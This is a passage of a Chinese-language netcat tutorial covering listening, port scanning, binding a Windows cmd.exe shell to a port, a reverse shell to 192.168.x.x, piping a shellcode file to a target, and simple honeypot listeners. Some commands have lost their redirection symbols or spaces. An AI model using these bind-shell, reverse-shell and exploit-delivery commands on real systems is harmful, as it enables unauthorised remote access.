2)监听LOCAL主机，例子： 格式：nc -l -p 80 讲解：监听本机的TCP80端口 3)扫描远程主机，例子： 格式：nc -nvv -w2 -z 192.168.x.x 80-445 讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子： 格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子： 格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法（其实NC的用法还有很多， 当配合管道命令"|"与重定向命令""、""等等命令功能更强大......）。

================= 高级用法========================：

6)作攻击程序用，例子： 格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2：nc-nvv192.168.x.x80讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果， 真是有异曲同工之妙:P) 附：'c:\exploit.txt'为shellcode等 7)作蜜罐用[1]，例子： 格式：nc -L -p 80 讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止 8)作蜜罐用[2]，例子： 格式：nc -L -p 80c:\log.txt 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把' gt;' 改为''即可以追加日志 附：'c:\log.txt'为日志等 9)作蜜罐用[3]，例子： 格式1：nc -L -p 80

格式2：type.exe c:\honeypot.txt|nc -L -p 80 讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容'送'入其 管道中